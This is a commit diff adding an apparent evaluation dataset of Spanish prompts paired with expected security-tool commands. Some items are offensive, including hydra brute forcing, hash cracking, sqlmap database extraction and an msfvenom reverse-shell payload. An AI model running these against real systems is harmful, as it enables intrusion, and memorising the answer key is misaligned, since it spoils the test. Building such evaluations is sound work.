add eval dataset: b3_commands.jsonl
Browse files- eval_data/b3_commands.jsonl +35 -0
eval_data/b3_commands.jsonl
ADDED
|
@@ -0,0 +1,35 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
{"id": "b3_000", "question": "Escanea los puertos abiertos en 192.168.1.1 con detecci贸n de versi贸n", "expected_command": "nmap -sV 192.168.1.1", "tool": "nmap"}
|
| 2 |
+
{"id": "b3_001", "question": "Descubre hosts activos en la subred 10.0.0.0/24", "expected_command": "nmap -sn 10.0.0.0/24", "tool": "nmap"}
|
| 3 |
+
{"id": "b3_002", "question": "Escanea con scripts de vulnerabilidades el host 10.10.10.5", "expected_command": "nmap --script vuln 10.10.10.5", "tool": "nmap"}
|
| 4 |
+
{"id": "b3_003", "question": "Escaneo sigiloso SYN al host 192.168.1.100", "expected_command": "nmap -sS 192.168.1.100", "tool": "nmap"}
|
| 5 |
+
{"id": "b3_004", "question": "Detecta el sistema operativo de 10.0.0.1", "expected_command": "nmap -O 10.0.0.1", "tool": "nmap"}
|
| 6 |
+
{"id": "b3_005", "question": "Rompe el hash MD5 'abc123...' con wordlist rockyou.txt", "expected_command": "hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt", "tool": "hashcat"}
|
| 7 |
+
{"id": "b3_006", "question": "Ataque de fuerza bruta a hash SHA256 con m谩scara ?a?a?a?a?a?a?a?a", "expected_command": "hashcat -m 1400 -a 3 hash.txt ?a?a?a?a?a?a?a?a", "tool": "hashcat"}
|
| 8 |
+
{"id": "b3_007", "question": "Fuerza bruta SSH al host 10.0.0.1 usuario admin con rockyou.txt", "expected_command": "hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.0.0.1", "tool": "hydra"}
|
| 9 |
+
{"id": "b3_008", "question": "Ataque de diccionario a formulario web login en 192.168.1.10", "expected_command": "hydra -l admin -P passwords.txt 192.168.1.10 http-post-form '/login:user=^USER^&pass=^PASS^:Invalid'", "tool": "hydra"}
|
| 10 |
+
{"id": "b3_009", "question": "Enumera directorios en http://target.com con wordlist common.txt", "expected_command": "gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt", "tool": "gobuster"}
|
| 11 |
+
{"id": "b3_010", "question": "Busca subdominios de target.com con gobuster", "expected_command": "gobuster dns -d target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt", "tool": "gobuster"}
|
| 12 |
+
{"id": "b3_011", "question": "Detecta inyecci贸n SQL en http://site.com/page?id=1", "expected_command": "sqlmap -u 'http://site.com/page?id=1' --batch", "tool": "sqlmap"}
|
| 13 |
+
{"id": "b3_012", "question": "Extrae todas las bases de datos del sitio vulnerable", "expected_command": "sqlmap -u 'http://site.com/page?id=1' --batch --dbs", "tool": "sqlmap"}
|
| 14 |
+
{"id": "b3_013", "question": "Busca exploits de EternalBlue en Metasploit", "expected_command": "msfconsole -q -x 'search eternalblue'", "tool": "msfconsole"}
|
| 15 |
+
{"id": "b3_014", "question": "Genera payload reverse shell Windows exe con msfvenom", "expected_command": "msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe -o shell.exe", "tool": "msfvenom"}
|
| 16 |
+
{"id": "b3_015", "question": "Captura tr谩fico HTTP en interfaz eth0", "expected_command": "tcpdump -i eth0 port 80 -w capture.pcap", "tool": "tcpdump"}
|
| 17 |
+
{"id": "b3_016", "question": "Muestra tr谩fico DNS en tiempo real", "expected_command": "tcpdump -i eth0 -n port 53", "tool": "tcpdump"}
|
| 18 |
+
{"id": "b3_017", "question": "Verifica el certificado SSL de google.com", "expected_command": "openssl s_client -connect google.com:443 -showcerts", "tool": "openssl"}
|
| 19 |
+
{"id": "b3_018", "question": "Genera un hash SHA256 del archivo malware.exe", "expected_command": "openssl dgst -sha256 malware.exe", "tool": "openssl"}
|
| 20 |
+
{"id": "b3_019", "question": "Descarga el archivo de forma silenciosa desde una URL", "expected_command": "wget -q https://example.com/file.tar.gz -O /tmp/file.tar.gz", "tool": "wget"}
|
| 21 |
+
{"id": "b3_020", "question": "Verifica si un servidor responde a peticiones HTTP", "expected_command": "curl -sI https://target.com | head -5", "tool": "curl"}
|
| 22 |
+
{"id": "b3_021", "question": "Extrae todas las IPs 煤nicas del archivo access.log", "expected_command": "grep -oP '\\d+\\.\\d+\\.\\d+\\.\\d+' access.log | sort -u", "tool": "grep"}
|
| 23 |
+
{"id": "b3_022", "question": "Cuenta intentos de login fallidos por IP en auth.log", "expected_command": "grep 'Failed password' /var/log/auth.log | awk '{print $11}' | sort | uniq -c | sort -rn", "tool": "grep"}
|
| 24 |
+
{"id": "b3_023", "question": "Busca archivos modificados en las 煤ltimas 2 horas en /etc", "expected_command": "find /etc -mmin -120 -type f 2>/dev/null", "tool": "find"}
|
| 25 |
+
{"id": "b3_024", "question": "Encuentra binarios con permiso SUID en el sistema", "expected_command": "find / -perm -4000 -type f 2>/dev/null", "tool": "find"}
|
| 26 |
+
{"id": "b3_025", "question": "Muestra todas las conexiones TCP establecidas", "expected_command": "ss -tnp state established", "tool": "ss"}
|
| 27 |
+
{"id": "b3_026", "question": "Lista puertos en escucha con el proceso asociado", "expected_command": "ss -tulnp", "tool": "ss"}
|
| 28 |
+
{"id": "b3_027", "question": "Rompe hashes en hashes.txt con wordlist rockyou.txt usando John", "expected_command": "john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt", "tool": "john"}
|
| 29 |
+
{"id": "b3_028", "question": "Lista procesos de un volcado de memoria con Volatility3", "expected_command": "python3 vol.py -f memory.dmp windows.pslist", "tool": "python3"}
|
| 30 |
+
{"id": "b3_029", "question": "Extrae artefactos de red de volcado de memoria", "expected_command": "python3 vol.py -f memory.dmp windows.netstat", "tool": "python3"}
|
| 31 |
+
{"id": "b3_030", "question": "Bloquea tr谩fico entrante de la IP 192.168.1.105", "expected_command": "iptables -A INPUT -s 192.168.1.105 -j DROP", "tool": "iptables"}
|
| 32 |
+
{"id": "b3_031", "question": "Permite tr谩fico SSH solo desde 10.0.0.0/24", "expected_command": "iptables -A INPUT -p tcp --dport 22 -s 10.0.0.0/24 -j ACCEPT", "tool": "iptables"}
|
| 33 |
+
{"id": "b3_032", "question": "Calcula el hash SHA256 de un archivo", "expected_command": "sha256sum archivo.bin", "tool": "sha256sum"}
|
| 34 |
+
{"id": "b3_033", "question": "Descomprime un archivo tar.gz", "expected_command": "tar -xzf archivo.tar.gz", "tool": "tar"}
|
| 35 |
+
{"id": "b3_034", "question": "Muestra los 煤ltimos 100 eventos del sistema en syslog", "expected_command": "tail -100 /var/log/syslog", "tool": "tail"}
|